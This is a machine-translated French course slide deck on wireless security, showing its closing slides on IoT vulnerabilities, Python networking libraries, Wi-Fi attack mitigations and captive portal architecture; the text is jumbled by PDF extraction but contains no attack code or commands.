Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Brève introduction
au piratage WPA Sécurité des
appareils
Android Sécurité IoT Outils Python pour le piratage et la
sécurité sans fil Atténuation et contre­mesures des attaques de réseau
WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Vulnérabilités de l'IoT et
IoT
cybersécurité
L'IoT est un concept technologique émergent : un réseau d'objets
connectés à Internet pour collecter et échanger des données. L'IoT a apporté de grands avantages, mais aussi de sérieux problèmes
L'IoT transforme notre façon de voyager, d'acheter, de fournir comme le révèle l'OWASP [Link]
de l'énergie et des soins de santé grâce à des appareils intégrant Top_10_IoT_Vulnerabilities_(2014 ) :
des capteurs et des puces complexes. Interface Web non sécurisée :
Les exemples d'appareils dotés de capacités IoT sont : les drones, les
voitures autonomes, les équipements médicaux... Authentification insuffisante :

Service réseau non sécurisé :

60/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Brève introduction
au piratage WPA Sécurité des
appareils
Android Sécurité IoT Outils Python pour le piratage et la
sécurité sans fil Atténuation et contre­mesures des attaques de réseau
WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Vulnérabilités de l'IoT et Vulnérabilités de l'IoT et


cybersécurité cybersécurité
Configurabilité de sécurité insuffisante :
Manque de sécurité de la couche transport :
Micrologiciel non sécurisé :
Manque d'intimité :
Interface cloud non sécurisée : Faible sécurité physique :

De nos jours, les pirates informatiques profitent grandement de toutes


Interface d'application mobile non sécurisée :
ces faiblesses de l'IoT pour créer et propager des botnets.

61/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Brève introduction
au piratage WPA Sécurité des
appareils
Android Sécurité IoT Outils Python pour le piratage et la
sécurité sans fil Atténuation et contre­mesures des attaques de réseau
WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Python et le piratage sans fil


Python et le piratage sans fil Python propose un certain nombre de bibliothèques pour la mise en réseau
et la sécurité :
Comme nous l'avons vu dans le module précédent, Python est l'un des
langages de script les plus populaires utilisés dans le domaine de la PyPi :
sécurité en raison de :
Pyric :[Link] [Link]
son efficacité ; wraith­wireless/PyRIC

sa modularité : Python­Wifi

Scapy :

62/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Brève introduction
au piratage WPA Sécurité des appareils
Android Sécurité
IoT Outils Python pour le piratage et la sécurité sans fil
Atténuation et contre­mesures des attaques de réseau WiFi Portail captif
WiFi (Coovachilli, alcasar, OTP)
Résumé

Attaques de réseaux Wi­Fi : atténuation des risques

Comment pouvez­vous contrecarrer la plupart des attaques que nous avons mentionnées ci­dessus ?

Utiliser un mot de passe complexe ;

Éliminez WEP et WPA ; préférez plutôt WPA2 ;

Désactivez le WPS sur le point d'accès ;

utilisez des normes de cryptage telles que CCMP, AES et TKIP ; corrigez

régulièrement le micrologiciel de votre point d'accès ;

Mettre en œuvre le mécanisme d’analyse des appareils Android ;

Évitez de télécharger des applications Android provenant de sources incertaines

63/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Brève Principes fondamentaux du portail captif Wi­Fi
introduction au piratage WPA
Sécurité des
appareils Android Sécurité IoT Outils Python pour le
piratage et la sécurité sans fil Atténuation et contre­mesures des
attaques de réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Principes fondamentaux du portail captif

Principes fondamentaux du portail captif

Un portail captif est un site Web utilisé pour l'authentification, l'autorisation et même le
traitement comptable des clients Wi­Fi.
Il peut être considéré comme un demandeur web agissant comme un service frontal protégeant
un réseau Wi­Fi ouvert en première main. Ce réseau nécessite une authentification
pour être traversé. Ainsi, toute tentative de passage via ce réseau est interceptée et le client est invité
à accéder à la page d'authentification web.
Une fois l'authentification réussie, un service AAA backend fournit des paramètres d'autorisation
ainsi que des paramètres de comptabilité (y compris la gestion des salaires) au client.

64/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Brève Principes fondamentaux du portail captif Wi­Fi
introduction au piratage WPA
Sécurité des
appareils Android Sécurité IoT Outils Python pour le
piratage et la sécurité sans fil Atténuation et contre­mesures des
attaques de réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Infrastructure de portail captif


Un portail captif se compose généralement de :

Service de portail : Il s'agit d'un démon exécuté en arrière­plan et à l'écoute des tentatives
d'accès des clients aux ressources protégées. Lorsqu'il détecte une telle tentative, il invite
le client à accéder au site web du portail.

Site Web du portail : il s'agit du site Web d'authentification, généralement avec


une page d'authentification demandée aux clients

Les exemples d'implémentation du portail captif sont :


Coovachilli, Alcasar, PacketFence, Pfsense MikroTik
Hotspot, Cisco Hotspot, Rukus Hotspot.

65/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Brève
introduction au piratage WPA
Sécurité des
appareils Android Sécurité IoT Outils Python pour le
piratage et la sécurité sans fil Atténuation et contre­mesures des
attaques de réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Résumé

Dans ce module, nous avons exploré les menaces de sécurité, les attaques et les contre­mesures liées aux technologies Wi­Fi.

66/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,

Vous aimerez peut-être aussi